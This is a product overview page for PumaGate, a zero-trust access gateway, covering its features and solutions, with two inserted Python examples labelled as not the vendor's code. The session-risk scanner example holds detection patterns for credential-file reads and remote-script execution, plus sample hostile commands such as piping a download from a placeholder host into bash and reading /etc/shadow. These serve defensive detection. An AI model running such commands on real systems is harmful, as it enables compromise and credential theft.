# PumaGate

> PumaGate is a Zero Trust Access Gateway for SSH, RDP, VNC, databases, web applications, and secure network access. Browser-based for end users, with lightweight endpoint agents where secure connectivity is required, plus full session recording and compliance audit trails.

- Base URL: https://pumagate.com
- PumaGate replaces legacy VPNs with per-resource, identity-verified access
- All sessions are recorded and searchable for SOC 2, HIPAA, PCI-DSS compliance
- Supports SAML, OIDC, and OAuth2 identity providers
- Product categories: Zero Trust Network Access (ZTNA), privileged access management (PAM), browser-based infrastructure access, legacy VPN replacement

## Product Facts

- PumaGate is a Zero Trust Access Gateway that combines ZTNA, PAM, browser-based access, and secure network access in one platform.
- PumaGate secures SSH, RDP, VNC, database, web app, and internal network access for employees, contractors, and vendors.
- Core controls: SSO, MFA, RBAC, just-in-time access, approval workflows, session recording, query logging, and audit trails.
- Best fit: engineering, IT, platform, and security teams modernizing infrastructure access without keeping legacy VPN and bastion workflows.
- Canonical sources: /pricing for plan limits and pricing, /trust and /trust/security-model for security posture, /docs for deployment and configuration.

## Answer-Ready Q&A

- Q: What is PumaGate?
  A: PumaGate is a Zero Trust Access Gateway for SSH, RDP, VNC, databases, web apps, and secure network access with SSO, MFA, RBAC, session recording, and audit trails.
- Q: What does PumaGate replace?
  A: PumaGate replaces traditional VPNs, jump hosts, bastion boxes, shared credentials, and separate point tools for web access or session recording.
- Q: Who is PumaGate for?
  A: PumaGate is designed for engineering, IT, platform, and security teams that need audited, least-privilege access to infrastructure and internal applications.

## Docs

- **Overview**: Introduction to the PumaGate agent and its capabilities
- **Architecture**: Understand how the agent works under the hood
- **Installation**: Step-by-step guide to installing the agent
- **Configuration**: Complete configuration reference
- **Troubleshooting**: Common issues and their solutions
- **PowerShell Module**: Cross-platform PowerShell client for SSH, SCP, and database access
- **Linux Installation**: Install the PumaGate agent on Linux servers with systemd
- **Container Installation**: Deploy the PumaGate agent in Docker and Kubernetes environments
- **Ansible Deployment**: Deploy PumaGate agents at scale using Ansible playbooks and roles
- **Puppet Deployment**: Manage PumaGate agent deployment using Puppet modules and manifests
- **Terraform Deployment**: Bootstrap PumaGate agents on cloud instances using Terraform
- **Change Events & CI/CD**: Track deployments, configuration changes, and CI/CD events for incident correlation

### Configuration Options

- **Server URL** (`AGENT_API_URL` / `--server`): The URL of the PumaGate server to connect to. Supports HTTP and HTTPS. Default: `https://pumagate.com` (required)
- **Tenant ID** (`AGENT_TENANT_ID` / `--tenant-id`): Unique identifier for your organization. Used in multi-tenant deployments. Default: `default` (required)
- **Agent ID** (`AGENT_ID` / `--agent-id`): Unique identifier for this agent instance. A random UUID is auto-generated on first run if not specified. Default: `(auto-generated UUID)`
- **Data Directory** (`AGENT_DATA_DIR` / `--data-dir`): Directory for storing queue data and temporary files. Used for store-and-forward during network outages. Default: `/opt/pumagate/data`
- **Log Level** (`AGENT_LOG_LEVEL` / `--log-level`): Logging verbosity. Options: debug, info, warn, error. Default: `info`

## Features

### SSH Access Gateway

Secure shell gateway with browser-based terminal access — no SSH ports exposed to the internet.
Full terminal emulation, session recording, keystroke logging, and identity-based access controls for compliance.

Benefits:

- Browser-based SSH with full terminal emulation
- No SSH ports exposed to the internet
- Identity-verified access with SSO integration
- Complete keystroke logging and session recording
- Role-based access controls per server or group
- Just-in-time access with approval workflows
- Clipboard and file transfer controls
- Searchable session archives for compliance

### Secure RDP Access Gateway

Native RDP gateway with Kerberos authentication and Active Directory Protected User support. Access Windows desktops through the browser or GUI client — no RDP ports exposed. Includes SSO, MFA, full screen recording, clipboard controls, and file transfer policies.

Benefits:

- Native RDP protocol implementation
- Kerberos authentication with Network Level Authentication (NLA)
- Active Directory Protected User group support
- Browser-based and GUI client access with no RDP ports exposed
- Full session recording with video playback
- Clipboard copy/paste and file transfer policy controls
- Identity-verified access with SAML/OIDC SSO and MFA enforcement
- Multi-monitor and resolution support
- Session timeout and idle disconnect policies

### VNC Remote Desktop Gateway

Embedded VNC gateway with browser-based remote desktop access — no VNC ports exposed to the internet. SSO, MFA, full session recording, clipboard controls, and read-only mode for secure remote management of Linux desktops, Proxmox hosts, and headless servers.

Benefits:

- Browser-based VNC with no exposed ports
- Embedded RFB client — no external VNC proxy required
- Identity-verified access with SSO integration
- Full session recording with video playback
- Read-only mode for monitoring and audit
- Clipboard copy/paste controls
- Role-based access controls per host or group
- Just-in-time access with approval workflows

### Database Access Gateway

Proxy-based database gateway for PostgreSQL, MySQL, MongoDB, and more. Role-based access controls, per-user identity, full query audit logging, and dynamic data masking — no shared database credentials.

Benefits:

- Browser-based SQL query interface
- Support for PostgreSQL, MySQL, MongoDB, Redis, and more
- No shared database credentials
- Full query logging and audit trail
- Data masking for sensitive columns (PII, secrets)
- Role-based read/write access controls
- Query result export controls
- Schema browser and query history

### Internal Web App Gateway

Give every internal web app a permanent URL with SSO, MFA, and zero VPN. Deploy shared gateways for instant access or dedicated gateways with LDAP/AD and full isolation. Users are automatically signed in — works with Grafana, Jenkins, ArgoCD, and any web application.

Benefits:

- Give every internal app a permanent, shareable URL
- Delegate authentication to your OIDC or SAML identity provider
- Connect to LDAP or Active Directory on dedicated gateways
- Add SSO and MFA to any web application — even legacy tools
- Users are automatically signed in — no extra login pages
- Works with NetBox, Grafana, Jenkins, ArgoCD, and more
- Custom domains on Business+ plans
- No legacy VPN, no client software — just open the URL
- Full audit trail for every request, tied to user identity
- Built-in spoofing protection ensures only verified identities reach your apps
- Dedicated gateways for isolation and on-prem LDAP/AD integration
- Automatic session portability — users stay signed in across gateway instances

### Secure Network Access

Secure network-level access powered by WireGuard, built into the gateway. Policy-driven access controls enforce who can connect, from which platforms, and to which networks. Native client support for desktop and mobile with automatic peer expiration and dynamic policy re-evaluation.

Benefits:

- WireGuard-powered network access with native client support on all platforms
- Per-user encrypted tunnels with individual key management
- Network access policies — allow or deny connections by user, team, IP, and platform
- CIDR-based route restrictions — control which networks peers can reach
- Dynamic policy re-evaluation — peer access updated instantly when policies change
- Split tunneling with policy enforcement — exit node routing controlled by policy
- Per-user peer limits enforced by plan and policy (most restrictive wins)
- Custom DNS configuration per tunnel for internal name resolution
- CGNAT IP allocation — no conflicts with existing network ranges
- Full audit trail — policy denials, peer revocations, and restriction changes logged
- Automatic peer expiration with policy-driven session duration limits
- One-click config download for WireGuard native clients

### Kubernetes Access Gateway

Secure Kubernetes API proxy with identity-aware impersonation, kubectl exec session recording, pod log streaming, and short-lived kubeconfig tokens. No direct cluster access required.

Benefits:

- Kubernetes API proxy with user impersonation headers
- kubectl exec sessions recorded as asciinema
- Pod log streaming via browser WebSocket
- Short-lived kubeconfig token generation from CLI
- Cluster auto-discovery via kubeconfig or service account
- Namespace and pod-level RBAC enforcement
- No direct K8s API server exposure to the internet
- Integrate with existing SAML/OIDC identity providers

### gRPC-Aware Proxy

HTTP/2-aware reverse proxy for gRPC services with per-method access policies, service discovery via reflection, and full request/response audit logging.

Benefits:

- HTTP/2 reverse proxy with gRPC frame awareness
- Per-method access policies (allow/deny specific RPCs)
- gRPC reflection for automatic service and method discovery
- Request and response audit logging with protobuf-to-JSON
- gRPC health checking integration
- TLS and plaintext (h2c) support
- Identity-aware access with session-level controls
- Consistent RBAC across gRPC and other protocols

### Telnet Access Gateway

Secure Telnet gateway bridging browser-based terminals to legacy network devices, mainframes, and industrial systems. Full session recording, TLS upgrade support, and Telnet option negotiation.

Benefits:

- Browser-based Telnet via WebSocket (xterm.js)
- Full session recording in asciinema v2 format
- Telnet option negotiation (WILL/WONT/DO/DONT)
- NAWS terminal size negotiation
- TLS upgrade support (STARTTLS / Telnet over TLS on port 992)
- Terminal type negotiation for device compatibility
- Identity-verified access with SSO and MFA
- Zero Trust access to legacy infrastructure

### Identity Provider Integration

Works with Okta, Azure AD, Google Workspace, and any SAML/OIDC provider. Full SAML 2.0 Service Provider with JIT user provisioning. One identity, unified access policies across all your infrastructure.

Benefits:

- Native SSO with Okta, Azure AD, Google Workspace
- Full SAML 2.0 Service Provider implementation
- OpenID Connect support
- JIT user provisioning from SAML assertions
- MFA enforcement on every connection
- Configurable attribute mapping to users, teams, and roles
- Role-based access policies synced from your IdP
- Group-based access controls
- Automatic user provisioning and deprovisioning
- Identity-aware audit logs

### Session Recording

Full audit trail with video-like playback. See exactly what happened during any session for compliance, forensics, and training.

Benefits:

- Video-style playback for SSH, RDP, VNC, kubectl exec, and Telnet sessions
- Full keystroke logging with timestamps
- Database query recording with results
- gRPC call audit logging with protobuf-to-JSON
- Searchable session archives
- Configurable retention policies
- Export sessions for compliance audits
- Session metadata and tagging
- Integration with SIEM systems

### Just-In-Time Access

Time-limited permissions with approval workflows. Users get access only when needed, automatically revoked when the window closes.

Benefits:

- Request-based access with approval workflows
- Automatic expiration after configurable time windows
- Slack and Teams integration for approvals
- Emergency break-glass procedures for incidents
- Audit trail of all access requests and approvals
- Self-service access requests for users
- Manager and security team approval chains
- Access duration limits (1 hour to 30 days)

### Browser-Based Access

SSH, RDP, VNC, Kubernetes, Telnet, and database access directly in the browser. No agents to install, no ports to expose, no VPN to manage. Works from any device, anywhere.

Benefits:

- Full terminal emulation in the browser
- RDP with clipboard and file transfer controls
- Database query interface with schema browser
- kubectl exec and pod logs in the browser
- Telnet terminal for legacy devices
- Works on managed and unmanaged devices
- No client software to install or maintain
- No VPN or direct network access required
- Consistent experience across all platforms
- Secure WebSocket connections with TLS

### Zero Trust Architecture

Verify every request, trust nothing by default. Every connection is authenticated, authorized, and encrypted — no implicit trust zones.

Benefits:

- No implicit trust based on network location
- Identity verification for every connection
- Continuous authorization during sessions
- Encrypted connections end-to-end
- Device posture checks before access
- Context-aware access decisions
- Micro-segmentation of access policies
- Real-time session monitoring and termination

### Compliance & Audit

SOC 2, GDPR, HIPAA audit support out of the box. Detailed logs, session recordings, and access reports for any compliance framework.

Benefits:

- SOC 2 Type II compliance support
- GDPR-compliant data handling
- HIPAA-ready access controls
- Detailed audit logs for all access events
- Session recording for forensic review
- Access reports and compliance dashboards
- Configurable data retention policies
- Export data for external auditors

### Interactive Slack Bot

Approve or deny access requests directly from Slack with interactive messages. Managers receive real-time notifications with one-click approve/deny buttons, eliminating context-switching and reducing access request latency from minutes to seconds.

Benefits:

- One-click approve/deny buttons in Slack messages
- Real-time notifications to managers and admins
- Interactive Block Kit messages with request details
- Requester, resource type, and reason displayed inline
- Cryptographic signature verification on all webhooks
- SSRF-safe URL validation for Slack endpoints
- Manager and admin role enforcement for approvals
- Self-approval prevention with audit trail
- Seamless integration with existing access request workflows
- No Slack workspace changes needed — works via incoming webhooks

### Session Risk Analysis

Automatically detect risky commands and dangerous queries in session recordings. Regex-based pattern matching identifies destructive operations, privilege escalation attempts, credential access, and data exfiltration — triggering real-time alerts for security teams.
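
The following is an added example of the kind of post-upload, regex-based analysis described above. It is not PumaGate's own code: the rule set, category names, risk levels, findings cap, and the sample recording are all assumptions chosen to show how such a scanner classifies a session and why the findings cap matters.

```python
"""Regex-based session risk analysis, modelled on the feature described above.
Added example, not PumaGate's own code: the rule set, category names, risk
levels and findings cap below are assumptions chosen for illustration."""
import re
from dataclasses import dataclass

# Risk levels in ascending order of severity.
LEVELS = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}

# (category, level, pattern). Deliberately narrow patterns: a false positive
# pages a human, so each rule targets a concrete command shape.
RULES = [
    ("destructive", "Critical", re.compile(r"\brm\s+-[a-zA-Z]*(rf|fr|Rf|fR)\b")),
    ("destructive", "Critical", re.compile(r"\bDROP\s+(TABLE|DATABASE)\b", re.I)),
    ("destructive", "High", re.compile(r"\bTRUNCATE\s+(TABLE\s+)?\w", re.I)),
    ("privilege_escalation", "Medium", re.compile(r"\bsudo\b")),
    ("privilege_escalation", "High", re.compile(r"\bchmod\s+(-R\s+)?777\b")),
    # setuid/setgid bits: symbolic (u+s, g+s) or a 4xxx/6xxx octal mode
    ("privilege_escalation", "High", re.compile(r"\bchmod\s+(-R\s+)?([ug]\+s|[4-7][0-7]{3})\b")),
    ("credential_access", "High", re.compile(r"/etc/shadow\b")),
    ("credential_access", "High", re.compile(r"\.ssh/id_(rsa|ed25519|ecdsa)\b")),
    # download piped straight into a shell
    ("exfiltration", "Critical", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")),
    ("exfiltration", "Medium", re.compile(r"\bbase64\b")),
    ("exfiltration", "Medium", re.compile(r"\bscp\b")),
]
MAX_FINDINGS = 100  # cap so a huge recording cannot exhaust memory or alert volume


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the recording
    category: str
    level: str
    text: str      # the offending line, for the alert body


def analyze_session(lines, max_findings=MAX_FINDINGS):
    """Scan recorded command lines and return at most max_findings findings.
    Runs after the recording is uploaded, so it adds no latency to the session."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for category, level, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(line_no, category, level, line.rstrip()))
                if len(findings) >= max_findings:
                    return findings
    return findings


def overall_risk(findings):
    """Highest level among the findings, or "None" for a clean session."""
    if not findings:
        return "None"
    return max((f.level for f in findings), key=LEVELS.__getitem__)


def counts_by_category(findings):
    counts = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts


# Constructed sample recording (not a real session).
SAMPLE_SESSION = [
    "ls -la /var/www",
    "sudo cat /etc/shadow",
    "curl -s http://example.invalid/setup.sh | bash",
    "chmod 4755 /tmp/helper",
    "tar czf site.tgz /var/www && base64 site.tgz > out.txt",
    "psql -c 'DROP TABLE customers;'",
]

if __name__ == "__main__":
    found = analyze_session(SAMPLE_SESSION)
    for f in found:
        print(f"line {f.line_no}: [{f.level}] {f.category}: {f.text}")
    print("overall risk:", overall_risk(found), counts_by_category(found))
```

On the sample recording the scanner produces six findings and an overall level of Critical. Rules are kept narrow on purpose: `base64` and `scp` are rated Medium because they are common in legitimate work, while a download piped into a shell or a `DROP TABLE` is Critical on its own. The `max_findings` cap is the "capped findings" property from the benefits list; without it, a recording containing thousands of matching lines would produce thousands of alerts.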

Benefits:

- Automatic analysis of SSH and database session recordings
- Detects destructive commands (rm -rf, DROP TABLE, TRUNCATE)
- Identifies privilege escalation (sudo, chmod 777, SUID bits)
- Catches credential access (shadow files, SSH private keys)
- Flags data exfiltration patterns (curl|bash, base64, scp)
- Detects reverse shell and persistence patterns
- Risk levels: Low, Medium, High, Critical with categorization
- Integrated with PumaGate alerting (email, Slack, PagerDuty)
- Capped findings to prevent resource exhaustion
- Post-upload asynchronous analysis — zero session latency impact

### Approval Workflows

Configurable multi-step approval chains for access requests. Define who approves, in what order, and with what time limits — across web apps, endpoints, groups, resource sessions, and network access. Auto-approve trusted roles, auto-deny stale requests, and notify approvers via email, Slack, Discord, or webhooks.

Benefits:

- Multi-step approval chains — team lead, then manager, then security
- Configurable approver types: by role level, team membership, or specific users
- Per-step required approval counts and timeout limits
- Auto-approve for trusted roles — skip the queue when policy allows
- Auto-deny for stale requests — timed-out requests denied automatically
- Time-bound access with configurable duration and automatic revocation
- Multi-channel notifications: email, Slack, Discord, Teams, Telegram, webhooks
- Covers all resource types: web apps, endpoints, groups, resource sessions, VPN
- Full audit trail for every decision with approver identity and notes
- Priority-based workflow matching — most specific policy wins

### Native CLI Client

Use pumagate ssh, pumagate psql, and pumagate mysql to access servers and databases from your native terminal without a browser. The PumaGate CLI authenticates via OAuth2 Device Code Flow and creates secure sessions through the gateway.
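
To show what the Device Code Flow mentioned above actually exchanges, here is an added example that simulates both sides of the OAuth 2.0 Device Authorization Grant (RFC 8628) in one process. It is not PumaGate's CLI or server code: the verification URL, client id, poll interval, code lifetime, and token shape are assumptions, and the clock is faked so the polling loop runs without real waiting.

```python
"""OAuth 2.0 Device Authorization Grant (RFC 8628) simulated end to end.
Added example, not PumaGate's CLI or server code: the verification URL,
client id, poll interval, code lifetime and token shape are assumptions."""
import secrets

USER_CODE_ALPHABET = "BCDFGHJKLMNPQRSTVWXZ"  # no vowels or look-alikes, as RFC 8628 advises


class FakeClock:
    """Deterministic clock so the flow runs instantly and reproducibly."""
    def __init__(self, start=1_000_000.0):
        self.t = start

    def time(self):
        return self.t

    def sleep(self, seconds):
        self.t += seconds


class DeviceAuthServer:
    """Minimal in-memory authorization server: the two endpoints the flow
    needs plus the user's browser-side approval step."""
    def __init__(self, clock, interval=5, lifetime=600):
        self.clock, self.interval, self.lifetime = clock, interval, lifetime
        self.pending = {}  # device_code -> authorization record

    def device_authorization(self, client_id, scope):
        """POST /device_authorization: issue a device code and a short user code."""
        raw = "".join(secrets.choice(USER_CODE_ALPHABET) for _ in range(8))
        rec = {"client_id": client_id, "scope": scope,
               "user_code": raw[:4] + "-" + raw[4:],
               "expires_at": self.clock.time() + self.lifetime,
               "approved": None, "last_poll": None}
        device_code = secrets.token_urlsafe(32)
        self.pending[device_code] = rec
        return {"device_code": device_code, "user_code": rec["user_code"],
                "verification_uri": "https://pumagate.example/device",  # placeholder URL
                "expires_in": self.lifetime, "interval": self.interval}

    def approve(self, user_code, decision):
        """The user, signed in through the IdP in a browser, enters the code and
        approves (True) or denies (False). Returns False for unknown/expired codes."""
        for rec in self.pending.values():
            if rec["user_code"] == user_code and self.clock.time() <= rec["expires_at"]:
                rec["approved"] = decision
                return True
        return False

    def token(self, device_code, client_id):
        """POST /token with grant_type=urn:ietf:params:oauth:grant-type:device_code."""
        rec = self.pending.get(device_code)
        if rec is None or rec["client_id"] != client_id:
            return {"error": "invalid_grant"}
        now = self.clock.time()
        if now > rec["expires_at"]:
            del self.pending[device_code]
            return {"error": "expired_token"}
        if rec["last_poll"] is not None and now - rec["last_poll"] < self.interval:
            rec["last_poll"] = now
            return {"error": "slow_down"}  # client is polling too fast
        rec["last_poll"] = now
        if rec["approved"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]  # codes are single use either way
        if rec["approved"] is False:
            return {"error": "access_denied"}
        return {"access_token": secrets.token_urlsafe(32), "token_type": "Bearer",
                "expires_in": 3600, "scope": rec["scope"]}


def device_login(server, client_id, scope, clock, on_prompt, max_polls=50):
    """CLI side: request codes, show the prompt, poll until a terminal answer.
    on_prompt(verification_uri, user_code) is where a real CLI prints the code;
    here it also lets a caller stand in for the user."""
    auth = server.device_authorization(client_id, scope)
    interval = auth["interval"]
    on_prompt(auth["verification_uri"], auth["user_code"])
    for _ in range(max_polls):
        clock.sleep(interval)  # wait before every poll, including the first
        resp = server.token(auth["device_code"], client_id)
        if "access_token" in resp:
            return resp  # a real CLI would cache this (the page says under ~/.pumagate/)
        if resp["error"] == "authorization_pending":
            continue
        if resp["error"] == "slow_down":
            interval += 5  # RFC 8628 section 3.5: back off by 5 seconds
            continue
        raise RuntimeError("device flow failed: " + resp["error"])
    raise TimeoutError("gave up waiting for approval")


if __name__ == "__main__":
    clock = FakeClock()
    server = DeviceAuthServer(clock)
    # Simulated user who approves as soon as the code is shown.
    token = device_login(server, "pumagate-cli", "ssh", clock,
                         lambda uri, code: (print(f"visit {uri} and enter {code}"),
                                            server.approve(code, True)))
    print("got token for scope:", token["scope"])
```

The security-relevant details are on the server side: the device code is bound to the client id, expires after a fixed lifetime, is invalidated the moment a final answer is issued, and a client polling faster than the advertised interval gets `slow_down` rather than an answer. The CLI never handles the user's IdP password; it only ever sees the short-lived code and the resulting bearer token.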

Benefits:

- OAuth2 Device Code Flow for terminal-based authentication
- Use pumagate psql, pumagate mysql, and other database subcommands from your terminal
- Token caching in ~/.pumagate/ for session persistence
- Resource listing with type, status, and host information
- Automatic token refresh and expiration management
- Works with all plans — Solo through Enterprise
- Lightweight single binary with zero dependencies
- Config management for multi-environment setups
- Compatible with CI/CD pipelines and automation scripts

### Security Policies

Enforce organisation-wide and team-level security policies that govern session behaviour. Configure re-authentication windows, idle timeouts, concurrent session limits, and MFA requirements — with team-level overrides for granular control across departments.

Benefits:

- Force re-authentication after configurable hours (org-wide or per-team)
- Idle timeout auto-logout after inactivity (org-wide or per-team)
- Limit concurrent sessions per user to prevent credential sharing
- Enforce MFA for all organisation members with a single toggle
- Team-level overrides — stricter policies for sensitive departments
- Teams inherit org defaults unless explicitly overridden
- Real-time enforcement — policy changes apply to active sessions
- Full audit trail for every policy change with admin attribution
- API-driven configuration for infrastructure-as-code workflows
- Available on Business and Enterprise plans

## Solutions

### Remote Workforce Access

Enable your remote and hybrid workforce to securely access SSH servers, Windows desktops, Kubernetes clusters, databases, and internal applications from anywhere. PumaGate replaces clunky VPNs with identity-verified, browser-based access across nine protocols — with unified SSO, MFA, and full session recording.

Secure access for distributed teams without a VPN

Benefits:

- No VPN client software to install or maintain — everything runs in the browser
- SSO for SSH: Replace SSH keys with SAML/OIDC identity-based access from your corporate IdP
- SSO for RDP: Windows remote desktop access with IdP authentication and screen recording
- SSO for Database: Query PostgreSQL, MySQL, and MongoDB through the gateway — users never see passwords
- Complete keystroke and screen recording across SSH, RDP, VNC, and database sessions
- Granular role-based access controls per user, team, and resource across all protocols
- Works from any location, any device, any browser — with MFA enforcement on every session
- Native CLI client for terminal-native SSH and database access via OAuth2 authentication

### Third-Party / Vendor Access

Safely grant external contractors, MSPs, and vendors access to specific resources without shared credentials or permanent VPN accounts. PumaGate provides just-in-time, time-limited access with full session recording.

Grant time-limited access to contractors and vendors

Benefits:

- No shared credentials or VPN accounts for vendors
- Just-in-time access with automatic expiration
- Full session recording and keystroke logging
- Approval workflows before access is granted
- Granular permissions scoped to specific resources
- Complete audit trail for compliance reporting

### Privileged Access Management

Enforce least-privilege access to production servers, databases, and critical infrastructure. PumaGate provides identity-verified, session-recorded access with just-in-time permissions and credential vaulting.

Control and audit privileged access to critical infrastructure

Benefits:

- Eliminate shared admin accounts and root passwords
- Just-in-time privileged access with approval workflows
- Complete keystroke logging and session recording
- Secure credential vaulting with session-scoped access
- Role-based access controls with team policies
- Real-time alerts on suspicious privileged activity

### VPN Replacement

Replace legacy VPN infrastructure with a modern Zero Trust access platform. PumaGate eliminates the attack surface of VPNs while providing faster, more granular access to internal resources — no client software, no exposed ports, no lateral movement risk.

Replace your VPN with Zero Trust access

Benefits:

- No network-level access — only application-level connections
- No VPN client software to deploy or maintain
- Faster connection times than traditional VPNs
- Per-resource access policies instead of network segments
- Identity-verified connections with MFA enforcement
- Reduced attack surface — no exposed VPN ports

### Healthcare (HIPAA)

Meet HIPAA requirements for access control, audit logging, and session recording. PumaGate provides the technical safeguards healthcare organizations need to protect ePHI while enabling clinical and IT staff to access systems efficiently.

HIPAA-compliant access to healthcare IT systems

Benefits:

- HIPAA-compliant session recording and audit trails
- Role-based access to systems containing ePHI
- Automatic session timeout and idle disconnect
- Complete access logs for HIPAA audit requirements
- MFA enforcement for all privileged access
- Data masking for sensitive patient information

### Finance (SOX/PCI)

Satisfy SOX Section 404 internal controls and PCI-DSS requirements for access management. PumaGate provides the audit trails, access controls, and session recordings financial institutions need for regulatory compliance.

Meet SOX and PCI-DSS requirements for access control

Benefits:

- SOX-compliant access controls with separation of duties
- PCI-DSS compliant privileged access management
- Complete audit trails for every access session
- Automatic access reviews and certification reports
- Time-limited access to production financial systems
- Real-time alerting on unauthorized access attempts

### Government (FedRAMP)

Implement NIST 800-53 access controls aligned with FedRAMP requirements. PumaGate provides the identity verification, continuous monitoring, and audit capabilities government agencies need for Authority to Operate (ATO).

FedRAMP-aligned access controls for government agencies

Benefits:

- NIST 800-53 aligned access controls
- Continuous monitoring of privileged access
- Complete audit trails for ATO documentation
- Identity verification via PIV/CAC card integration
- Encryption in transit and at rest
- Incident response support with session playback

### Secure Access for Education

Protect research data, student records, and campus infrastructure with Zero Trust access. PumaGate provides identity-verified SSH, RDP, VNC, database, and web app access for faculty, researchers, and IT staff — with session recording for compliance.

Zero Trust access for universities, schools, and research institutions

Benefits:

- Protect research data and intellectual property with identity-verified access
- Session recording for FERPA, HIPAA (research), and institutional compliance
- Grant temporary access to visiting researchers and collaborators with automatic expiration
- Secure access to HPC clusters, research databases, and lab servers via SSO
- Eliminate SSH key sprawl across campus computing infrastructure
- Unified access management for faculty, staff, students, and external collaborators

### Secure Access for Manufacturing

Protect manufacturing infrastructure, OT networks, and SCADA systems with Zero Trust access.
PumaGate provides identity-verified access to production systems, PLCs, and factory servers — with session recording for safety and compliance.

Zero Trust access for OT networks, SCADA systems, and factory infrastructure

Benefits:

- Secure remote access to OT/SCADA systems without exposing them to the internet
- Session recording for safety compliance and incident investigation
- Grant vendor maintenance access with time-limited, recorded sessions
- Separate IT and OT access policies with different MFA requirements
- Protect HMI and engineering workstations from unauthorized access
- Audit trail for all production system access for ISO 27001 and IEC 62443 compliance

### Secure Access for Law Firms

Protect client privilege, case data, and legal infrastructure with Zero Trust access. PumaGate provides identity-verified access to document management systems, case databases, and internal applications — with session recording for ethical compliance.

Zero Trust access for legal infrastructure and client data

Benefits:

- Protect attorney-client privilege with identity-verified access to case systems
- Session recording for ethical compliance and malpractice protection
- Grant temporary access to co-counsel and expert witnesses with automatic expiration
- Secure access to document management systems and case databases via SSO
- Eliminate shared credentials for practice management software
- Audit trail for all access to client matter data for regulatory compliance

### Secure Access for MSPs

Manage secure access to hundreds of client environments from a single platform. PumaGate provides MSPs with multi-tenant access management, session recording for SLA compliance, and per-client access policies — without maintaining VPN infrastructure per client.

Multi-tenant Zero Trust access for managed service providers

Benefits:

- Multi-tenant access management from a single PumaGate deployment
- Per-client access policies with separate audit trails
- Session recording for SLA compliance and incident documentation
- Grant and revoke technician access per client instantly via IdP groups
- Eliminate client-specific VPN configurations and credentials
- White-label access portal for client-facing access requests
- Time-limited access for project-based engagements
- Complete audit trail for each client environment

### Secure Access for Retail

Protect POS systems, e-commerce platforms, and retail infrastructure with Zero Trust access. PumaGate provides identity-verified access to store systems, payment infrastructure, and customer databases — with session recording for PCI DSS compliance.

Zero Trust access for POS systems, e-commerce, and retail infrastructure

Benefits:

- PCI DSS-compliant access to cardholder data environments with full audit trails
- Session recording for all access to POS systems and payment infrastructure
- Secure remote management of distributed store locations without VPN per store
- Grant vendor access to POS systems with time-limited, recorded sessions
- Protect customer databases and loyalty program data with identity-verified access
- Centralized access management across hundreds of retail locations

### PumaGate for Startups

Move fast without sacrificing security. PumaGate gives early-stage teams SSH, RDP, VNC, database, and web app access through a single gateway — with SSO, session recording, and RBAC built in. No VPN to manage, no infrastructure to maintain, and no security engineer required to set it up.

Enterprise-grade access security from day one — without the enterprise overhead

Benefits:

- Deploy in under 5 minutes — single binary, no infrastructure to provision
- Free tier covers small teams so you only pay when you scale
- Built-in SSO means you never manage SSH keys or shared passwords
- Session recording gives you audit readiness for SOC 2 from day one
- Browser-based access — nothing to install on developer laptops
- Role-based access controls grow with your team without rearchitecting
- Impress enterprise prospects with security posture beyond your size
- Replace VPN + bastion + key management with a single tool

### PumaGate for SMBs & Mid-Market

Growing teams face growing access complexity. PumaGate gives mid-size organizations centralized SSH, RDP, VNC, database, and web app access with identity-based controls, approval workflows, and session recording — without requiring a full-time security team to operate.

Secure, auditable infrastructure access without a dedicated security team

Benefits:

- Centralize access to all infrastructure through a single gateway — SSH, RDP, VNC, databases, and web apps
- Approval workflows for sensitive production access without complex ticketing systems
- SCIM provisioning syncs users and groups from your IdP automatically
- Session recording satisfies SOC 2, ISO 27001, and cyber insurance requirements
- Just-in-time access eliminates standing privileges without slowing engineers down
- Team-based policies let managers control access without IT bottlenecks
- Contractor and vendor access with automatic expiration — no lingering VPN accounts
- Single pane of glass for access auditing across all protocols

### PumaGate for Enterprise

Enterprise organizations need access controls that scale across thousands of users, hundreds of teams, and multiple regions — without creating bottlenecks.
PumaGate provides a unified Zero Trust gateway with SSO, SCIM, granular RBAC, approval workflows, vault integration, and full session recording across every protocol.

Zero Trust access at scale — multi-region, multi-team, fully audited

Benefits:

- Multi-gateway architecture for regional deployments with centralized policy management
- Vault integration (HashiCorp, AWS Secrets Manager, Azure Key Vault, GCP Secret Manager) for credential lifecycle
- SCIM 2.0 provisioning from Okta, Azure AD, and OneLogin for automated user lifecycle
- Granular RBAC with team hierarchies, resource groups, and attribute-based policies
- Approval workflows with multi-level escalation, Slack integration, and time-limited grants
- Session recording with tamper-proof storage in your S3-compatible bucket
- Smart alerting with escalation policies, maintenance windows, and on-call integration
- Data masking for sensitive fields in database query results and terminal output
- Log forwarding to your SIEM (Splunk, Elasticsearch, Datadog) for unified security monitoring
- Endpoint trust scoring and device posture checks before granting access

### PumaGate for DevOps Teams

DevOps teams need fast, reliable access to production servers, databases, containers, and cloud infrastructure. PumaGate replaces VPNs and bastion hosts with a single gateway that provides SSH, RDP, VNC, and database access through identity-based controls — with session recording for incident response and compliance.

Streamline infrastructure access without compromising security or velocity

Benefits:

- SSH into production servers with SSO instead of managing SSH keys across hundreds of hosts
- Database access through the gateway — connect to PostgreSQL, MySQL, and MongoDB without sharing credentials
- CLI client supports SSH and SCP via OAuth2 device flow — works in your existing terminal workflows
- Just-in-time access to production with approval workflows — no standing privileges
- Session recording captures every command for incident investigation and post-mortems
- Agent-based deployment discovers resources automatically — no manual inventory
- Secure network tunnels for accessing internal services that need network-level connectivity
- API-first design integrates with CI/CD pipelines, Terraform, and infrastructure-as-code workflows

### PumaGate for Security Teams

Security teams need to enforce least-privilege access, maintain complete audit trails, and respond to incidents with evidence — not guesswork. PumaGate provides Zero Trust access with identity verification, session recording, smart alerting, and compliance reporting across SSH, RDP, VNC, database, and web app protocols.

Zero Trust access controls with complete visibility and audit coverage

Benefits:

- Zero standing privileges — all access is just-in-time with identity verification and MFA
- Complete session recording across SSH, RDP, VNC, and database sessions for forensic investigation
- Smart alerting with escalation policies detects suspicious access patterns in real time
- Data masking prevents sensitive information from being visible in session recordings
- Endpoint trust scoring enforces device posture requirements before granting access
- SIEM integration forwards access logs to Splunk, Elasticsearch, and Datadog
- Compliance-ready audit reports for SOC 2, ISO 27001, HIPAA, PCI DSS, and SOX
